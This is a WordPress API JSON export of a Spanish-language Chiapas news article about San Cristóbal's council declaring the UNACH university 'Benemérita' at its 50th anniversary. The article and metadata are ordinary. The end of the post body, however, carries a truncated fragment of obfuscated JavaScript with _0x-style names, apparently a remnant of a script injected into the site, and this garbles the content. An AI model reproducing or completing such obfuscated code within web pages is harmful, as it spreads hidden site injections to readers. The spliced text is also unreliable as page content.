{"id":22728,"date":"2025-06-28T03:34:46","date_gmt":"2025-06-28T03:34:46","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22728"},"modified":"2025-06-28T03:34:46","modified_gmt":"2025-06-28T03:34:46","slug":"declaran-benemerita-a-la-unach-en-historica-sesion-solemne-de-cabildo-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22728","title":{"rendered":"Declaran Benem\u00e9rita a la UNACH en hist\u00f3rica Sesi\u00f3n Solemne de Cabildo en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1010\" height=\"1024\" data-id=\"22729\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193129-1010x1024.jpg\" alt=\"\" class=\"wp-image-22729\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193129-1010x1024.jpg 1010w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193129-296x300.jpg 296w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193129-768x779.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193129-1515x1536.jpg 1515w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193129.jpg 1578w\" sizes=\"auto, (max-width: 1010px) 100vw, 1010px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"575\" data-id=\"22730\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193132-1024x575.jpg\" alt=\"\" class=\"wp-image-22730\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193132-1024x575.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193132-300x168.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193132-768x431.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193132-1536x862.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193132.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"532\" data-id=\"22731\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193135-1024x532.jpg\" alt=\"\" class=\"wp-image-22731\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193135-1024x532.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193135-300x156.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193135-768x399.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193135-1536x799.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193135.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"590\" data-id=\"22733\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193126-1024x590.jpg\" alt=\"\" class=\"wp-image-22733\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193126-1024x590.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193126-300x173.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193126-768x443.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193126-1536x885.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193126.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"749\" data-id=\"22734\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193141-1024x749.jpg\" alt=\"\" class=\"wp-image-22734\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193141-1024x749.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193141-300x219.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193141-768x562.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193141-1536x1123.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193141.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"22732\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193138-1024x682.jpg\" alt=\"\" class=\"wp-image-22732\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193138-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193138-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193138-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193138-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000193138.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 27 de junio de 2025.\u2013 En un acto de profundo significado institucional, social y educativo, el Ayuntamiento de San Crist\u00f3bal de Las Casas celebr\u00f3 una Sesi\u00f3n Solemne de Cabildo en el Museo de San Crist\u00f3bal (Musac) para reconocer oficialmente a la Universidad Aut\u00f3noma de Chiapas (UNACH) como instituci\u00f3n Benem\u00e9rita, en el marco de su 50 aniversario.<\/p>\n\n\n\n<p>La presidenta municipal, Mtra. Fabiola Ricci Diestel, destac\u00f3 en su discurso que esta declaratoria no es un acto simb\u00f3lico, sino un reconocimiento leg\u00edtimo al compromiso, vocaci\u00f3n y legado que la UNACH ha construido en cinco d\u00e9cadas de servicio a Chiapas. \u201cEl adjetivo benem\u00e9rita no se entrega por costumbre ni se pronuncia a la ligera. Se otorga a quienes han ganado, con constancia, el respeto del pueblo al que sirven. Y Chiapas puede decir con justicia que la UNACH ha merecido bien esta distinci\u00f3n\u201d.<\/p>\n\n\n\n<p>Ricci Diestel record\u00f3 que la universidad fue fundada en 1975, por iniciativa del entonces gobernador Dr. Manuel Velasco Su\u00e1rez, y desde entonces se ha convertido en una puerta de acceso a la educaci\u00f3n superior para miles de chiapanecos y chiapanecas, especialmente en zonas donde antes no exist\u00edan oportunidades educativas. \u201cSan Crist\u00f3bal no solo es la capital cultural de Chiapas, tambi\u00e9n es la capital del derecho y la educaci\u00f3n\u201d, refiri\u00e9ndose a la importancia de la Facultad de Derecho.<\/p>\n\n\n\n<p>Durante su intervenci\u00f3n, el rector de la UNACH, Dr. Oswaldo Chac\u00f3n Rojas, enfatiz\u00f3 que solo unas pocas universidades p\u00fablicas del pa\u00eds ostentan el t\u00edtulo de Benem\u00e9rita, y destac\u00f3 que la instituci\u00f3n ha formado a m\u00e1s de 100 mil profesionales en estos 50 a\u00f1os. \u201cHemos sido un motor de transformaci\u00f3n social. No solo formamos profesionistas, sino tambi\u00e9n grandes seres humanos. Y hoy, con todos nuestros programas acreditados y con una firme vinculaci\u00f3n con la sociedad, seguimos trabajando para estar a la altura de los retos globales y locales\u201d.<\/p>\n\n\n\n<p>En representaci\u00f3n del gobernador Dr. Eduardo Ram\u00edrez Aguilar, asisti\u00f3 Leticia M\u00e9ndez Intzin, Secretaria para el Desarrollo Sustentable de los Pueblos Ind\u00edgenas, quien reafirm\u00f3 el compromiso del Gobierno del Estado con la universidad y el derecho a una educaci\u00f3n superior con sentido social,\u201dla UNACH ha sido gu\u00eda y cimiento en la formaci\u00f3n de miles de estudiantes, hoy agentes del desarrollo regional, nacional e internacional\u201d.<\/p>\n\n\n\n<p>Tambi\u00e9n intervino el Mtro. Lucas Reyes Castellanos, representante de la bicentenaria Facultad de Derecho, quien subray\u00f3 que esta reforma al art\u00edculo 104 de la Constituci\u00f3n del Estado no solo es un acto legal, sino un gesto de gratitud hist\u00f3rica hacia una universidad que ha sido s\u00edmbolo de excelencia, justicia, y servicio p\u00fablico. \u201cLa UNACH representa una vocaci\u00f3n humanista y pluricultural, comprometida con el bienestar de los pueblos de Chiapas\u201d, manifest\u00f3.<\/p>\n\n\n\n<p>La sesi\u00f3n concluy\u00f3 con un mensaje de unidad institucional y con el firme compromiso de seguir impulsando a la Universidad Aut\u00f3noma de Chiapas como eje transformador, \u00e9tico y social en el presente y futuro del estado.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>San Crist\u00f3bal de Las Casas, 27 de junio de 2025.\u2013 En un acto de profundo significado institucional, social y educativo, el Ayuntamiento de San Crist\u00f3bal de Las Casas celebr\u00f3 una Sesi\u00f3n Solemne de Cabildo en el Museo de San Crist\u00f3bal (Musac) para reconocer oficialmente a la Universidad Aut\u00f3noma de Chiapas (UNACH) como instituci\u00f3n Benem\u00e9rita, en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22734,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-22728","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22728","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22728"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22728\/revisions"}],"predecessor-version":[{"id":22735,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22728\/revisions\/22735"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22734"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22728"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22728"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22728"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}